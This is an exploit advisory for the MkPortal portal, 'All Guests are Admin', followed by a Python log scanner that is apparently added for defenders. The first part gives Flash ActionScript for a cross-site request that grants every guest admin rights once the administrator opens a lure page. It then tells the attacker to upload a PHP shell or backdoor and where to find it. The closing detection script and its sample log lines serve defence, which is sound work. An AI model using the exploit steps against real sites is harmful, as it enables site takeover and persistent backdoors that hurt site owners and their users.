
MkPortal "All Guests are Admin" Exploit

Vulnerability discovered and exploited by: Demential
Web: http://headburn.altervista.org 
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it 

Start Macromedia Flash and create an swf file with this code:

var idg:Number = 9;
var p13:Number = 1;
var Salva:String = "Save+Permissions";
getURL("http://victim.com/mkportal/admin.php?ind=ad_perms&op=save_main", "_self", "POST"); 

Translate "Save+Permissions" into the language the MKPortal site uses.
Example: "Salva+questi+permessi" for Italian sites.

Then upload the swf file to a webserver and create an html page like this:

Put a title here

Put some text here

Now send the html page to the MKPortal administrator. When the admin opens the page, all guests will be able to administer MKPortal. So you can go here: http://victim.com/mkportal/admin.php?ind=ad_contents&op=contents_new_php and paste a php shell or a backdoor. You can find your shell here: http://victim.com/mkportal/cache/ppage_*.php where * is the ID of the page. Translate "page" into the language the MKPortal site uses. Example: "pagina" for Italian sites.
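
For defenders, the requests described above leave a recognizable trail in the web server access log. The following Python script is an added example, not part of the original advisory: it flags a POST to admin.php?ind=ad_perms&op=save_main whose Referer is not the portal itself, then reports any PHP page editor use or cache/p<page>_*.php requests that follow it. The hostname portal.example, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "portal.example"  # assumption: the portal's own hostname

# Combined log format: ip - user [time] "METHOD target PROTO" status size "referer" ...
LINE = re.compile(r'^\S+ \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)"')
# Cache file named in the advisory; the "page" part is localized (e.g. "pagina")
CACHE_PAGE = re.compile(r"/cache/p[a-z]+_[^/]+\.php$")


def classify(line):
    """Map one log line to 'perm_save_offsite', 'php_editor', 'cache_page' or None."""
    m = LINE.match(line)
    if not m:
        return None
    method, target, referer = m.groups()
    url = urlsplit(target)
    query = parse_qs(url.query)
    action = (query.get("ind", [""])[0], query.get("op", [""])[0])
    if url.path.endswith("/admin.php"):
        # A missing Referer ("-") has no hostname and is treated as off-site too
        offsite = urlsplit(referer).hostname != SITE_HOST
        if method == "POST" and action == ("ad_perms", "save_main") and offsite:
            return "perm_save_offsite"
        if action == ("ad_contents", "contents_new_php"):
            return "php_editor"
    if CACHE_PAGE.search(url.path):
        return "cache_page"
    return None


def scan(lines):
    """Report the off-site permission save and any editor/cache activity after it."""
    findings, armed = [], False
    for number, line in enumerate(lines, 1):
        kind = classify(line)
        armed = armed or kind == "perm_save_offsite"
        if kind and armed:
            findings.append((number, kind))
    return findings


# Constructed sample log lines (not from a real server)
T, P = "- - [10/Mar/2007:10:00:00 +0000]", "/mkportal"
LOG = [f'192.0.2.10 {T} "GET {P}/admin.php?ind=ad_contents&op=contents_new_php HTTP/1.1" 200 9 "http://portal.example{P}/admin.php" "UA"',
       f'192.0.2.10 {T} "POST {P}/admin.php?ind=ad_perms&op=save_main HTTP/1.1" 200 9 "http://portal.example{P}/admin.php?ind=ad_perms" "UA"',
       f'192.0.2.10 {T} "POST {P}/admin.php?ind=ad_perms&op=save_main HTTP/1.1" 200 9 "http://other.example/page.html" "UA"',
       f'203.0.113.9 {T} "GET {P}/admin.php?ind=ad_contents&op=contents_new_php HTTP/1.1" 200 9 "-" "UA"',
       f'203.0.113.9 {T} "GET {P}/cache/ppagina_12.php HTTP/1.1" 200 9 "-" "UA"',
       f'203.0.113.9 {T} "GET {P}/index.php HTTP/1.1" 200 9 "-" "UA"']
```

The administrator's own editor use and same-site permission save (sample lines 1 and 2) are not reported; only the off-site save and the activity after it are.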
